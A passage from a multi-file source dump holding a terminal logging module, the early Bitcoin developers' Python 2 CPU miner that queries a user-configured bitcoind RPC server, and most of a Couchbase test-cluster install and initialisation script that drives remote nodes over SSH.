shell_objects = setup()
action(shell_objects)
action_mapping = {'shell':shell_action, 'runserver':runserver_action,
'run_service':runserver_action}
|
log.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import copy
import io
import logging
import os
import re
import sys
import threading
import time
from typing import List, Optional, Sequence # noqa
from . import filesystem
LOG = logging.getLogger(__name__) # type: logging.Logger
PERFORMANCE = 15 # type: int
PROMPT = 50 # type: int
SUCCESS = 60 # type: int
stdout = io.StringIO(newline="") # type: io.StringIO
class Color:
YELLOW = "\033[33m" # type: str
RED = "\033[31m" # type: str
GREEN = "\033[32m" # type: str
class Format:
BOLD = "\033[1m" # type: str
CLEAR_LINE = "\x1b[0G\x1b[K" # type: str
CLEAR = "\033[0m" # type: str
TRUNCATE_OVERFLOW = "\033[?7l" # type: str
WRAP_OVERFLOW = "\033[?7h" # type: str
NEWLINE = "\n" # type: str
CURSOR_UP_LINE = "\x1b[1A" # type: str
HIDE_CURSOR = "\x1b[?25l" # type: str
SHOW_CURSOR = "\x1b[?25h" # type: str
class Character:
LAMBDA = "ƛ" # type: str
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__("%(asctime)s %(levelname)s %(message)s")
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD = 0.5 # type: float
LINE_BREAKING_LEVELS = ["ERROR", "WARNING", "SUCCESS"] # type: Sequence[str]
_terminate = False # type: bool
_last_update = 0.0 # type: float
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator = "" # type: str
self.setLevel(logging.INFO)
self._record = None # type: Optional[logging.LogRecord]
self._last_record = None # type: Optional[logging.LogRecord]
self._active_lines = 0 # type: int
# Preamble preparing terminal.
sys.stderr.write(
Format.NEWLINE
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record: logging.LogRecord, age: Optional[float] = None) -> None:
self._last_record = record
suffix = ""
color = ""
active_lines = record.msg.count("\n") + 1
if record.levelname in self.LINE_BREAKING_LEVELS:
record.msg += "\n"
if record.levelname == "ERROR":
color = Color.RED
self._record = None
active_lines = 0
elif record.levelname == "WARNING":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "PROMPT":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
elif age:
if age > 10:
color = Color.YELLOW
if age > 30:
color = Color.RED
suffix = " {}[{:.1f}s]{}".format(
color if color else "", age, Format.CLEAR if color else ""
)
else:
self._record = record
self._last_update = time.time()
timed_record = copy.copy(record)
timed_record.msg = (
"{clear_line}{color} {cursor}{clear} " "{truncate}{message}{suffix}"
).format(
clear_line=self.clear_lines(),
color=color,
cursor=Character.LAMBDA,
clear=Format.CLEAR,
truncate=Format.TRUNCATE_OVERFLOW,
message=record.msg,
suffix=suffix,
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
if self._record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(self._record, age)
time.sleep(0.1)
def terminate(self) -> None:
last_record = self._last_record
if last_record and last_record.levelname not in self.LINE_BREAKING_LEVELS:
sys.stderr.write("\n")
# Reset terminal.
sys.stderr.write(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR)
sys.stderr.flush()
self._terminate = True
def initialize(arguments: argparse.Namespace) -> None:
if arguments.noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
# pyre-fixme[16]: `Namespace` has no attribute `timed_stream_handler`.
arguments.timed_stream_handler = None
else:
stream_handler = TimedStreamHandler()
arguments.timed_stream_handler = stream_handler
handlers = [stream_handler] # type: List[logging.Handler]
if not arguments.noninteractive:
pyre_directory = filesystem.make_pyre_directory()
file_handler = logging.FileHandler(os.path.join(pyre_directory, "pyre.stderr"))
file_handler.setFormatter(SectionFormatter())
file_handler.setLevel(logging.DEBUG)
handlers.append(file_handler)
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=handlers)
def cleanup(arguments: argparse.Namespace) -> None:
if arguments.timed_stream_handler:
arguments.timed_stream_handler.terminate()
output = stdout.getvalue()
if output:
sys.stdout.write(output + "\n")
class Buffer:
THRESHOLD = 0.1 # type: float
_flushed = False # type: bool
def __init__(self, section: str, data: List[str]) -> None:
self._section = section # type: str
self._data = data # type: List[str]
self._lock = threading.RLock() # type: threading.RLock
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def append(self, line: str) -> None:
self._data.append(line)
def flush(self) -> None:
with self._lock:
if self._flushed is True:
return
self._flushed = True
message = "\n".join(self._data)
if self._section == "ERROR":
LOG.error(message)
elif self._section == "INFO":
LOG.info(message)
elif self._section == "DUMP":
LOG.warning(message)
elif self._section == "WARNING":
LOG.warning(message)
elif self._section == "PROGRESS":
LOG.info(message)
elif self._section == "PARSER":
LOG.error(message)
else:
LOG.debug("[%s] %s", self._section, message)
def _thread(self) -> None:
time.sleep(self.THRESHOLD)
with self._lock:
if not self._flushed:
self.flush()
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2342
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
install_utils.py
|
import getopt
import re
import subprocess
import sys
import threading
import time
sys.path = [".", "lib"] + sys.path
import testconstants
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from membase.api.rest_client import RestConnection
import install_constants
import TestInput
import logging.config
import os.path
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
NodeHelpers = []
# Default params
params = {
"version": None,
"install_tasks": install_constants.DEFAULT_INSTALL_TASKS,
"url": None,
"debug_logs": False,
"cb_edition": install_constants.CB_ENTERPRISE,
"timeout": install_constants.INSTALL_TIMEOUT,
"all_nodes_same_os": False,
"skip_local_download": True,
"storage_mode": "plasma",
"disable_consistency": False,
"enable_ipv6": False,
"use_domain_names": False,
"fts_quota": testconstants.FTS_QUOTA,
"fts_query_limit": 0
}
class build:
def __init__(self, name, url, path, product="cb"):
self.name = name
self.url = url
self.path = path
self.product = product
self.version = params["version"]
class NodeHelper:
def __init__(self, node):
self.node = node
self.ip = node.ip
self.params = params
self.build = None
self.queue = None
self.thread = None
self.rest = None
self.install_success = False
self.connect_ok = False
self.shell = None
self.info = None
self.enable_ipv6 = False
self.check_node_reachable()
self.nonroot = self.shell.nonroot
self.actions_dict = install_constants.NON_ROOT_CMDS if self.nonroot else install_constants.CMDS
def check_node_reachable(self):
start_time = time.time()
# Try 3 times
while time.time() < start_time + 60:
try:
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
self.info = self.shell.extract_remote_info()
self.connect_ok = True
if self.connect_ok:
break
except Exception as e:
log.warning("{0} unreachable, {1}, retrying..".format(self.ip, e))
time.sleep(20)
def get_os(self):
os = self.info.distribution_version.lower()
to_be_replaced = ['\n', ' ', 'gnu/linux']
for _ in to_be_replaced:
if _ in os:
os = os.replace(_, '')
if self.info.deliverable_type == "dmg":
major_version = os.split('.')
os = major_version[0] + '.' + major_version[1]
return os
def uninstall_cb(self):
need_nonroot_relogin = False
if self.shell.nonroot:
self.node.ssh_username = "root"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
need_nonroot_relogin = True
if self.actions_dict[self.info.deliverable_type]["uninstall"]:
cmd = self.actions_dict[self.info.deliverable_type]["uninstall"]
if "msi" in cmd:
'''WINDOWS UNINSTALL'''
self.shell.terminate_processes(self.info, [s for s in testconstants.WIN_PROCESSES_KILLED])
self.shell.terminate_processes(self.info, \
[s + "-*" for s in testconstants.COUCHBASE_FROM_VERSION_3])
installed_version, _ = self.shell.execute_command(
"cat " + install_constants.DEFAULT_INSTALL_DIR["WINDOWS_SERVER"] + "VERSION.txt")
if len(installed_version) == 1:
installed_msi, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] + "; ls *" + installed_version[
0] + "*.msi")
if len(installed_msi) == 1:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["uninstall"].replace("installed-msi",
installed_msi[0]))
for browser in install_constants.WIN_BROWSERS:
self.shell.execute_command("taskkill /F /IM " + browser + " /T")
else:
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["uninstall"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.shell.terminate_processes(self.info, install_constants.PROCESSES_TO_TERMINATE)
if need_nonroot_relogin:
self.node.ssh_username = "nonroot"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
def pre_install_cb(self):
if self.actions_dict[self.info.deliverable_type]["pre_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["pre_install"]
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["pre_install"]
if cmd is not None and "HDIUTIL_DETACH_ATTACH" in cmd:
start_time = time.time()
while time.time() < start_time + timeout:
try:
ret = hdiutil_attach(self.shell, self.build.path)
if ret:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
def install_cb(self):
self.pre_install_cb()
if self.actions_dict[self.info.deliverable_type]["install"]:
if "suse" in self.get_os():
cmd = self.actions_dict[self.info.deliverable_type]["suse_install"]
else:
cmd = self.actions_dict[self.info.deliverable_type]["install"]
cmd = cmd.replace("buildbinary", self.build.name)
cmd = cmd.replace("buildpath", self.build.path)
cmd = cmd.replace("mountpoint", "/tmp/couchbase-server-" + params["version"])
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_install_cb()
def post_install_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["post_install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
if self.actions_dict[self.info.deliverable_type]["post_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["post_install"].replace("buildversion", self.build.version)
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
else:
if self.actions_dict[self.info.deliverable_type]["post_install_retry"]:
if self.info.deliverable_type == "msi":
check_if_downgrade, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] +
"; vi +\"set nobomb | set fenc=ascii | x\" install_status.txt; "
"grep 'Adding WIX_DOWNGRADE_DETECTED property' install_status.txt")
print((check_if_downgrade * 10))
else:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["post_install_retry"],
debug=self.params["debug_logs"])
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
def set_cbft_env_options(self, name, value, retries=3):
if self.get_os() in install_constants.LINUX_DISTROS:
while retries > 0:
if self.shell.file_exists("/opt/couchbase/bin/", "couchbase-server"):
ret, _ = self.shell.execute_command(install_constants.CBFT_ENV_OPTIONS[name].format(value))
self.shell.stop_server()
self.shell.start_server()
time.sleep(10)
if ret == ['1']:
log.info("{0} set to {1} on {2}".format(name, value, self.ip))
break
else:
time.sleep(20)
retries -= 1
else:
print_result_and_exit("Unable to set fts_query_limit on {0}".format(self.ip))
def _get_cli_path(self):
if self.get_os() in install_constants.LINUX_DISTROS:
return install_constants.DEFAULT_CLI_PATH["LINUX_DISTROS"]
elif self.get_os() in install_constants.MACOS_VERSIONS:
return install_constants.DEFAULT_CLI_PATH["MACOS_VERSIONS"]
elif self.get_os() in install_constants.WINDOWS_SERVER:
return install_constants.DEFAULT_CLI_PATH["WINDOWS_SERVER"]
def _set_ip_version(self):
if params["enable_ipv6"]:
self.enable_ipv6 = True
if self.node.ip.startswith("["):
hostname = self.node.ip[self.node.ip.find("[") + 1:self.node.ip.find("]")]
else:
hostname = self.node.ip
cmd = install_constants.NODE_INIT["ipv6"].format(self._get_cli_path(),
self.ip,
hostname,
self.node.rest_username,
self.node.rest_password)
else:
cmd = install_constants.NODE_INIT["ipv4"].format(self._get_cli_path(),
self.ip,
self.node.rest_username,
self.node.rest_password)
self.shell.execute_command(cmd)
def pre_init_cb(self):
try:
self._set_ip_version()
if params["fts_query_limit"] > 0:
self.set_cbft_env_options("fts_query_limit", params["fts_query_limit"])
except Exception as e:
log.warning("Exception {0} occurred during pre-init".format(e))
def post_init_cb(self):
# Optionally change node name and restart server
if params.get('use_domain_names', False):
RemoteUtilHelper.use_hostname_for_server_settings(self.node)
# Optionally disable consistency check
if params.get('disable_consistency', False):
self.rest.set_couchdb_option(section='couchdb',
option='consistency_check_ratio',
value='0.0')
def get_services(self):
if not self.node.services:
return ["kv"]
elif self.node.services:
return self.node.services.split(',')
def allocate_memory_quotas(self):
kv_quota = 0
info = self.rest.get_nodes_self()
start_time = time.time()
while time.time() < start_time + 30 and kv_quota == 0:
kv_quota = int(info.mcdMemoryReserved * testconstants.CLUSTER_QUOTA_RATIO)
time.sleep(1)
self.services = self.get_services()
if "index" in self.services:
log.info("Setting INDEX memory quota as {0} MB on {1}".format(testconstants.INDEX_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service='indexMemoryQuota', memoryQuota=testconstants.INDEX_QUOTA)
kv_quota -= testconstants.INDEX_QUOTA
if "fts" in self.services:
log.info("Setting FTS memory quota as {0} MB on {1}".format(params["fts_quota"], self.ip))
self.rest.set_service_memoryQuota(service='ftsMemoryQuota', memoryQuota=params["fts_quota"])
kv_quota -= params["fts_quota"]
if "cbas" in self.services:
log.info("Setting CBAS memory quota as {0} MB on {1}".format(testconstants.CBAS_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service="cbasMemoryQuota", memoryQuota=testconstants.CBAS_QUOTA)
kv_quota -= testconstants.CBAS_QUOTA
if "kv" in self.services:
if kv_quota < testconstants.MIN_KV_QUOTA:
log.warning("KV memory quota is {0}MB but needs to be at least {1}MB on {2}".format(kv_quota,
testconstants.MIN_KV_QUOTA,
self.ip))
kv_quota = testconstants.MIN_KV_QUOTA
log.info("Setting KV memory quota as {0} MB on {1}".format(kv_quota, self.ip))
self.rest.init_cluster_memoryQuota(self.node.rest_username, self.node.rest_password, kv_quota)
def init_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["init"]
self.wait_for_completion(duration * 2, event)
start_time = time.time()
while time.time() < start_time + timeout:
try:
init_success = False
self.pre_init_cb()
self.rest = RestConnection(self.node)
# Make sure that data_path and index_path are writable by couchbase user
for path in set([_f for _f in [self.node.data_path, self.node.index_path] if _f]):
for cmd in ("rm -rf {0}/*".format(path),
"chown -R couchbase:couchbase {0}".format(path)):
self.shell.execute_command(cmd)
self.rest.set_data_path(data_path=self.node.data_path, index_path=self.node.index_path)
self.allocate_memory_quotas()
self.rest.init_node_services(hostname=None,
username=self.node.rest_username,
password=self.node.rest_password,
services=self.get_services())
if "index" in self.get_services():
self.rest.set_indexer_storage_mode(storageMode=params["storage_mode"])
self.rest.init_cluster(username=self.node.rest_username,
password=self.node.rest_password)
init_success = True
if init_success:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_init_cb()
def wait_for_completion(self, duration, event):
if params["debug_logs"]:
log.info(event.format(duration, self.ip))
time.sleep(duration)
def cleanup_cb(self):
cmd = self.actions_dict[self.info.deliverable_type]["cleanup"]
if cmd:
try:
# Delete all but the most recently accessed build binaries
self.shell.execute_command(cmd, debug=self.params["debug_logs"])
except:
#ok to ignore
pass
def _get_mounted_volumes(shell):
volumes, _ = shell.execute_command("ls /tmp | grep '{0}'".format("couchbase-server-"))
return volumes
def hdiutil_attach(shell, dmg_path):
volumes = _get_mounted_volumes(shell)
for volume in volumes:
shell.execute_command("hdiutil detach " + '"' + "/tmp/" + volume + '"')
shell.execute_command("umount " + '"' + "/tmp/" + volume + '"')
shell.execute_command("hdiutil attach {0} -mountpoint /tmp/{1}".
format(dmg_path, "couchbase-server-" + params["version"]))
return shell.file_exists("/tmp/", "couchbase-server-" + params["version"])
def get_node_helper(ip):
for node_helper in NodeHelpers:
if node_helper.ip == ip:
return node_helper
return None
def print_result_and_exit(err=None):
if err:
log.error(err)
success = []
fail = []
for server in params["servers"]:
node = get_node_helper(server.ip)
if not node or not node.install_success:
fail.append(server.ip)
elif node.install_success:
success.append(server.ip)
log.info("-" * 100)
for _ in fail:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in success:
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
if len(fail) > 0:
sys.exit(1)
def process_user_input():
params = _parse_user_input()
_params_validation()
return params
def _parse_user_input():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p:', [])
for o, a in opts:
if o == "-h":
print_result_and_exit(install_constants.USAGE)
if len(sys.argv) <= 1:
print_result_and_exit(install_constants.USAGE)
userinput = TestInput.TestInputParser.get_test_input(sys.argv)
except IndexError:
print_result_and_exit(install_constants.USAGE)
except getopt.GetoptError as err:
print_result_and_exit(str(err))
# Mandatory params
if not userinput.servers:
print_result_and_exit("No servers specified. Please use the -i parameter." + "\n" + install_constants.USAGE)
else:
params["servers"] = userinput.servers
# Validate and extract remaining params
for key, value in list(userinput.test_params.items()):
if key == "debug_logs":
params["debug_logs"] = True if value.lower() == "true" else False
if key == "install_tasks":
tasks = []
for task in value.split('-'):
if task in install_constants.DEFAULT_INSTALL_TASKS and task not in tasks:
tasks.append(task)
if len(tasks) > 0:
params["install_tasks"] = tasks
log.info("INSTALL TASKS: {0}".format(params["install_tasks"]))
if "install" not in params["install_tasks"] and "init" not in params["install_tasks"]:
return params # No other parameters needed
if key == 'v' or key == "version":
if re.match('^[0-9\.\-]*$', value) and len(value) > 5:
params["version"] = value
if key == "url":
if value.startswith("http"):
params["url"] = value
else:
log.warning('URL:{0} is not valid, will use version to locate build'.format(value))
if key == "type" or key == "edition" and value.lower() in install_constants.CB_EDITIONS:
params["cb_edition"] = value.lower()
if key == "timeout" and int(value) > 60:
params["timeout"] = int(value)
if key == "storage_mode":
params["storage_mode"] = value
if key == "disable_consistency":
params["disable_consistency"] = True if value.lower() == "true" else False
if key == "skip_local_download":
params["skip_local_download"] = False if value.lower() == "false" else True
if key == "enable_ipv6":
if value.lower() == "true":
for server in params["servers"]:
if re.match('\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', server.ip):
print_result_and_exit(
"Cannot enable IPv6 on an IPv4 machine: {0}. Please run without enable_ipv6=True.".format(
server.ip))
params["enable_ipv6"] = True
if key == "fts_quota" and int(value) >= 256:
params["fts_quota"] = int(value)
if key == "fts_query_limit" and int(value) > 0:
params["fts_query_limit"] = int(value)
if not params["version"] and not params["url"]:
print_result_and_exit("Need valid build version or url to proceed")
return params
def __check_servers_reachable():
reachable = []
unreachable = []
for server in params["servers"]:
try:
RemoteMachineShellConnection(server, exit_on_failure=False)
reachable.append(server.ip)
except Exception as e:
log.error(e)
unreachable.append(server.ip)
if len(unreachable) > 0:
log.info("-" * 100)
for _ in unreachable:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in reachable:
# Marking this node as "completed" so it is not moved to failedInstall state
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
sys.exit(1)
def _params_validation():
__check_servers_reachable()
# Create 1 NodeHelper instance per VM
for server in params["servers"]:
NodeHelpers.append(NodeHelper(server))
# Version compatibility
node_os = []
for node in NodeHelpers:
if node.get_os() not in install_constants.SUPPORTED_OS:
print_result_and_exit("Install on {0} OS is not supported".format(node.get_os()))
else:
node_os.append(node.get_os())
if len(set(node_os)) == 1:
params["all_nodes_same_os"] = True
_check_version_compatibility(NodeHelpers[0])
else:
for node in NodeHelpers:
_check_version_compatibility(node)
# TODO: check if cb version is compatible with os
def _check_version_compatibility(node):
pass
def pre_install_steps():
if "install" in params["install_tasks"]:
if params["url"] is not None:
if NodeHelpers[0].shell.is_url_live(params["url"]):
params["all_nodes_same_os"] = True
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = params["url"]
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
else:
print_result_and_exit("URL {0} is not live. Exiting.".format(params["url"]))
else:
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = __get_build_url(node, build_binary)
if not build_url:
print_result_and_exit(
"Build is not present in latestbuilds or release repos, please check {0}".format(build_binary))
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
_download_build()
def _execute_local(command, timeout):
# -- Uncomment the below 2 lines for python 3
# process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait(timeout)
# process.communicate()[0].strip()
# -- python 2
process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait()
def __copy_thread(src_path, dest_path, node):
logging.info("Copying %s to %s" % (src_path, node.ip))
node.shell.copy_file_local_to_remote(src_path, dest_path)
logging.info("Done copying build to %s.", node.ip)
def _copy_to_nodes(src_path, dest_path):
copy_threads = []
for node in NodeHelpers:
copy_to_node = threading.Thread(target=__copy_thread, args=(src_path, dest_path, node))
copy_threads.append(copy_to_node)
copy_to_node.start()
for thread in copy_threads:
thread.join()
def __get_build_url(node, build_binary):
if params["enable_ipv6"]:
ipv6_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_FQDN_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(ipv6_url, exit_if_not_live=False):
return ipv6_url
else:
latestbuilds_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
release_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_RELEASE_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(latestbuilds_url, exit_if_not_live=False):
return latestbuilds_url
elif node.shell.is_url_live(release_url, exit_if_not_live=False):
return release_url
return None
def _download_build():
if params["all_nodes_same_os"] and not params["skip_local_download"]:
check_and_retry_download_binary_local(NodeHelpers[0])
_copy_to_nodes(NodeHelpers[0].build.path, NodeHelpers[0].build.path)
else:
for node in NodeHelpers:
build_url = node.build.url
filepath = node.build.path
cmd = install_constants.DOWNLOAD_CMD[node.info.deliverable_type]
if "curl" in cmd:
cmd = cmd.format(build_url, filepath,
install_constants.WAIT_TIMES[node.info.deliverable_type]
["download_binary"])
elif "wget" in cmd:
cmd = cmd.format(__get_download_dir(node), build_url)
